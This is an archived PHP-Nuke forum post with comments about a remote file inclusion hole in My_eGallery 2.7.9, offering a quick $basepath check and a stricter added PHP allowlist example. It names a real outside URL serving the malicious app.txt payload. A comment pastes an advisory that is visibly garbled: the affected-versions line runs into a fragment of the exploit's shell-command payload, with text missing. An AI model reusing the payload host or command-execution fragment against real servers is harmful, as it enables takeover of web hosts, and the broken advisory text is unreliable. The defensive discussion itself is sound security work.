Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!!

Laffer writes "I found out how to quickly fix the Security Exploit.
Open the File displayCategory.php in /modules/My_eGallery/public
after the first line starting insert:
$bug = strpos($basepath,"http");
if ($bug === false) {
and before the last line starting with ?>
insert:
}
else {
echo "You are trying to hack our site! GO AWAY BASTARD!";
}
How does this work? The exploit is STUPID! $basepath contains the base path of the My_eGallery modules. In the first lines of displayCategory.php some files must be included. Now if the attacker gives $basepath new content via the URL, in the exploit's case the http://www.bywordonline.com/sc/app.txt value, then the module includes this code from outside into the program. The app.txt then runs system calls with the rights of the webserver.
My fix will test if basepath contains a link to an outside URL instead of a local path (looking for http); if this is found, code execution is suspended. Maybe not the best fix, but a quick fix. There is still a hole, but now the attacker must first upload a bad file to execute it. I will work further on this issue to fix it completely. Help from the Nukecops would be great!!!
See ya"

Posted on Friday, November 28 @ 16:20:30 CET by Zhen-Xjell
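
A stricter form of the check described in the post, as an added example that is not part of the original post or of My_eGallery: instead of looking for "http" in $basepath, it accepts only a directory that resolves inside the module's own tree, which also covers the local-file hole the post says remains. The helper safe_basepath(), the temporary directory layout and the example.invalid URL are constructed for illustration.

```php
<?php
// Added example, not My_eGallery code. safe_basepath() is a hypothetical helper.

/**
 * Return the canonical form of $candidate if it is a directory inside $root,
 * or null if it names a URL/stream wrapper, is missing, or lies outside $root.
 * $root should be fixed on the server side and never taken from the request.
 */
function safe_basepath($candidate, $root)
{
    if (!is_string($candidate) || strpos($candidate, '://') !== false
        || strpos($candidate, "\0") !== false) {
        return null;                          // rejects any scheme, not only http
    }
    $rootReal = realpath($root);
    $real     = realpath($candidate);         // resolves ".." and symlinks
    if ($rootReal === false || $real === false || !is_dir($real)) {
        return null;
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;                          // local, but outside the module tree
    }
    return $real . DIRECTORY_SEPARATOR;
}

// Constructed demo tree: a module directory with an upload directory beside it.
$tmp    = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'egallery_demo_' . getmypid();
$module = "$tmp/modules/My_eGallery";
@mkdir("$module/public", 0700, true);
@mkdir("$tmp/uploads", 0700, true);

// Constructed candidate values for $basepath.
$candidates = array(
    'remote URL'    => 'http://example.invalid/app.txt',
    'upload dir'    => "$tmp/uploads",
    'relative path' => "$module/public/../../../uploads",
    'module dir'    => "$module/public",
);
foreach ($candidates as $label => $c) {
    // The substring test from the post, next to the allowlist check.
    $quick = (strpos($c, 'http') === false) ? 'allowed' : 'blocked';
    $hard  = (safe_basepath($c, $module) !== null) ? 'allowed' : 'blocked';
    printf("%-14s quick fix: %-8s allowlist: %s\n", $label, $quick, $hard);
}
```

Where the installed PHP version provides them, the allow_url_fopen and allow_url_include settings also keep include from fetching remote URLs, independently of any check in the module.
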
Re: Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!! (Score: 1) by Johan1982 on Friday, November 28 @ 18:40:47 CET
Is a permanent solution still not known? Hopefully the staff of Nukecops will contribute a permanent fix.

Re: Security Bug in My_eGallery 2.7.9 FIXED!!! READ!!! (Score: 1) by Jeruvy on Friday, November 28 @ 18:58:41 CET
Here is the actual exploit. For some reason ZjenXjell doesn't want to post my news on this so I'm including it here. Perhaps you can gather a solution to this:
Product: My_eGallery
Versions affected: all /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).
3. Solution
-----------
Vendor was contacted and promptly replied. Fix is available at the vendor's
site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5
As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.
Regards,
Bojan Zdrnja
CISSP